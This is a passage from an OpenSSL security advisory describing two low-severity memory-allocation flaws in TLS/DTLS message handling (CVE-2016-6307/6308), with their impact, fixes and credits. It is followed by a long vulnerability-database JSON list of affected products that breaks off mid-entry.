A TLS message includes 3 bytes for its length in the header for the message. This would allow for messages up to 16Mb in length. Messages of this length are excessive and OpenSSL includes a check to ensure that a peer is sending reasonably sized messages in order to avoid too much memory being consumed to service a connection. A flaw in the logic of version 1.1.0 means that memory for the message is allocated too early, prior to the excessive message length check. Due to way memory is allocated in OpenSSL this could mean an attacker could force up to 21Mb to be allocated to service a connection. This could lead to a Denial of Service through memory exhaustion. However, the excessive message length check still takes place, and this would cause the connection to immediately fail. Assuming that the application calls SSL_free() on the failed conneciton in a timely manner then the 21Mb of allocated memory will then be immediately freed again. Therefore the excessive memory allocation will be transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the event that the connection fails or 2) The application is working in a constrained environment where there is very little free memory or 3) The attacker initiates multiple connection attempts such that there are multiple connections in a state where memory has been allocated for the connection; SSL_free() has not yet been called; and there is insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to be transitory because as soon as the connection fails the memory is subsequently freed again in the SSL_free() call. However there is an increased risk during this period of application crashes due to the lack of memory - which would then mean a more serious Denial of Service.
This issue does not affect DTLS users.
OpenSSL 1.1.0 TLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
Excessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)
Severity: Low
This issue is very similar to CVE-2016-6307. The underlying defect is different but the security analysis and impacts are the same except that it impacts DTLS.
A DTLS message includes 3 bytes for its length in the header for the message. This would allow for messages up to 16Mb in length. Messages of this length are excessive and OpenSSL includes a check to ensure that a peer is sending reasonably sized messages in order to avoid too much memory being consumed to service a connection. A flaw in the logic of version 1.1.0 means that memory for the message is allocated too early, prior to the excessive message length check. Due to way memory is allocated in OpenSSL this could mean an attacker could force up to 21Mb to be allocated to service a connection. This could lead to a Denial of Service through memory exhaustion. However, the excessive message length check still takes place, and this would cause the connection to immediately fail. Assuming that the application calls SSL_free() on the failed conneciton in a timely manner then the 21Mb of allocated memory will then be immediately freed again. Therefore the excessive memory allocation will be transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the event that the connection fails or 2) The application is working in a constrained environment where there is very little free memory or 3) The attacker initiates multiple connection attempts such that there are multiple connections in a state where memory has been allocated for the connection; SSL_free() has not yet been called; and there is insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to be transitory because as soon as the connection fails the memory is subsequently freed again in the SSL_free() call. However there is an increased risk during this period of application crashes due to the lack of memory - which would then mean a more serious Denial of Service.
This issue does not affect TLS users.
OpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team, Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL development team.
Note
As per our previous announcements and our Release Strategy (https://www.openssl.org/policies/releasestrat.html), support for OpenSSL version 1.0.1 will cease on 31st December 2016. No security updates for that version will be provided after that date. Users of 1.0.1 are advised to upgrade.
Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates.
References
URL for this Security Advisory: https://www.openssl.org/news/secadv/20160922.txt
Note: the online version of the advisory may be updated with additional details over time.
For details of OpenSSL severity classifications please see: https://www.openssl.org/policies/secpolicy.html
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201609-0592", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2a" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "5.0.0" }, { "model": "icewall sso agent option", "scope": "eq", "trust": 1.0, "vendor": "hp", "version": "10.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1m" }, { "model": "icewall mcrp", "scope": "eq", "trust": 1.0, "vendor": "hp", "version": "3.0" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "6.7.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2h" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "6.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1r" }, { "model": "icewall sso", "scope": "eq", "trust": 1.0, "vendor": "hp", "version": "10.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.04" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "0.10.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1n" }, { "model": "icewall federation agent", "scope": "eq", "trust": 1.0, "vendor": "hp", "version": "3.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "0.12.16" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "4.0.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2f" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "4.2.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "4.6.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1s" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1t" }, { "model": "node.js", "scope": "lte", "trust": 1.0, "vendor": "nodejs", "version": "4.1.2" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "16.04" }, { "model": "node.js", "scope": "lt", "trust": 1.0, "vendor": "nodejs", "version": "0.10.47" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2b" }, { "model": "node.js", "scope": "lte", "trust": 1.0, "vendor": "nodejs", "version": "5.12.0" }, { "model": "suse linux enterprise module for web scripting", "scope": "eq", "trust": 1.0, "vendor": "novell", "version": "12.0" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "node.js", "scope": "gte", "trust": 1.0, "vendor": "nodejs", "version": "0.12.0" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "(64)" }, { "model": "web server", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "express" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "enterprise v8.2 to v9.4" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional for plug-in" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- messaging" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "foundation v8.2 to v8.5" }, { "model": "ucosminexus developer standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "(64)" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "01" }, { "model": "enterpriseidentitymanager", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "certd" }, { "model": "ix2000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "st ard v8.2 to v9.4" }, { "model": "ucosminexus developer light", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "agent option" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "sg3600 all series" }, { "model": "application server for developers", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.2i" }, { "model": "linux enterprise module for web scripting", "scope": null, "trust": 0.8, "vendor": "suse", "version": null }, { "model": "ucosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "express v8.2 to v9.4" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "st ard-r" }, { "model": "enterprisedirectoryserver", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.0 to v8.1" }, { "model": "ucosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base(64)" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "icewall federation agent", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "ix1000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "cosminexus http server", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "capssuite", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0 to v4.0" }, { "model": "webotx portal", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v9.1" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "-r" }, { "model": "ucosminexus service architect", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server enterprise", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "esmpro/serveragentservice", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "all versions (linux edition )" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.2" }, { "model": "icewall mcrp", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "ucosminexus application server standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw" }, { "model": "ix3000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional" }, { "model": "node.js", "scope": null, "trust": 0.8, "vendor": "node js", "version": null }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus application server smart edition", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "application server", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "webex centers t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.3" }, { "model": "big-ip afm hf6", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "big-ip apm hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13150-13" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip gtm hf9", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.2" }, { "model": "nexus series blade switches 4.1 e1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4000" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.9" }, { "model": "big-ip analytics hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0.0" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "big-ip analytics build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.110.104.180" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69010" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "ucs central software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip aam build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.40.1.256" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13" }, { "model": "stealthwatch management console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "tivoli provisioning manager for os deployment 5.1.fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.2" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.5" }, { "model": "project openssl 1.0.2g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "jabber software development kit", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip ltm build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.110.104.180" }, { "model": "computer telephony integration object server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip afm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "unified workforce optimization", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "industrial router 1.2.1rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "910" }, { "model": "firepass", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "7.0" }, { "model": "big-ip gtm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.1" }, { "model": "big-ip analytics hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "big-ip apm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "big-ip afm hf6", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.14" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0.0" }, { "model": "big-ip link controller build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.01.14.628" }, { "model": "big-ip apm hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1.0" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "nexus series switches standalone nx-os mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.3.1" }, { "model": "nexus series switches standalone nx-os mode 7.0 i5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-" }, { "model": "big-ip link controller hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.11" }, { "model": "big-ip link controller hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip aam hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.5" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip pem hf6", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.26" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.4" }, { "model": "big-ip pem hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.6.0.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "big-ip afm hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "stealthwatch flowcollector sflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip aam hf11", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.11" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60002.9" }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip afm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "agent for openflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip link controller hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "prime collaboration provisioning", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.4" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.4" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.8" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "big-ip apm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.15" }, { "model": "big-ip apm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "ons series multiservice provisioning platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "154540" }, { "model": "telepresence sx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.4" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings client hosted t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "asa next-generation firewall services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip aam hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "big-ip apm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "big-ip aam hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "big-ip aam hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0.1" }, { "model": "big-ip afm build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.01.14.628" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8200" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.2" }, { "model": "big-ip aam hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.9" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "unified communications manager im \u0026 presence service (formerly c", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.3" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.1" }, { "model": "webex meetings for blackberry", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.5" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip afm hf8", "scope": "eq", "trust": 0.3, "vendor": 